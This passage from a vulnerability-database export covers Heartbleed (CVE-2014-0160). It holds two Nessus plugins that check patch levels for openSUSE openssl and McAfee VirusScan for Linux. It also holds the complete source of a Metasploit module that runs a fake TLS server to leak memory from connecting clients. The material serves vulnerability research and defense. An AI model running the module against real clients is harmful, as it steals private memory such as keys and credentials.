(openSUSE-SU-2014:0492-1) (Heartbleed)\");\n script_summary(english:\"Check for the openSUSE-2014-277 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872299\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl-devel-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debugsource-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", 
reference:\"libopenssl-devel-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl-devel-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debugsource-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopenssl-devel / libopenssl-devel-32bit / libopenssl1_0_0 / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:46:00", "description": "The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) that is affected by an information disclosure due to a flaw in\nthe OpenSSL library, commonly known as the Heartbleed bug. 
An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.", "edition": 25, "published": "2014-05-03T00:00:00", "title": "McAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:virusscan_enterprise"], "id": "MCAFEE_VSEL_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73854", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73854);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks VSEL version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) that is affected by an information disclosure due to a flaw in\nthe OpenSSL library, commonly known as the Heartbleed bug. 
An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:virusscan_enterprise\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_vsel_detect.nbin\");\n script_require_keys(\"installed_sw/McAfee VirusScan Enterprise for Linux\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"McAfee VirusScan Enterprise for Linux\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nhotfixes = install['Hotfixes'];\nmax_hotfix = int(install['max_hotfix']);\nvuln = FALSE;\n\n# Determine fix.\nif (version =~ \"^1\\.7\\.1\\.\")\n{\n max = \"1.7.1.28698\";\n hotfix = \"HF-961964\";\n}\nelse if (version =~ \"^1\\.9\\.\")\n{\n max = \"1.9.0.28822\";\n hotfix = \"HF-960962\";\n}\nelse if (version =~ \"^2\\.0\\.\")\n{\n max = \"2.0.0.28948\";\n hotfix = \"HF-960961\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:max, strict:FALSE) <= 0)\n{\n if (report_paranoia > 1 && !isnull(hotfixes) && hotfix >!< hotfixes) vuln = TRUE;\n else\n {\n hotfix_int = int(hotfix - \"HF-\");\n if (max_hotfix < hotfix_int) vuln = TRUE;\n }\n}\n\nif (vuln)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix + \" or later\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-08T00:09:20", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. 
This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "published": "2014-04-09T14:38:11", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2020-05-17T19:51:14", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture', 'Description' => 'Run server to disclose memory from incoming clients']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to 
negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n 
process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if 
data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if 
@state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use 
the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = 
OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n 
tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of 
each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}], "openvas": [{"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "type": "openvas", "title": "RedHat Update for openssl RHSA-2014:0376-01", 
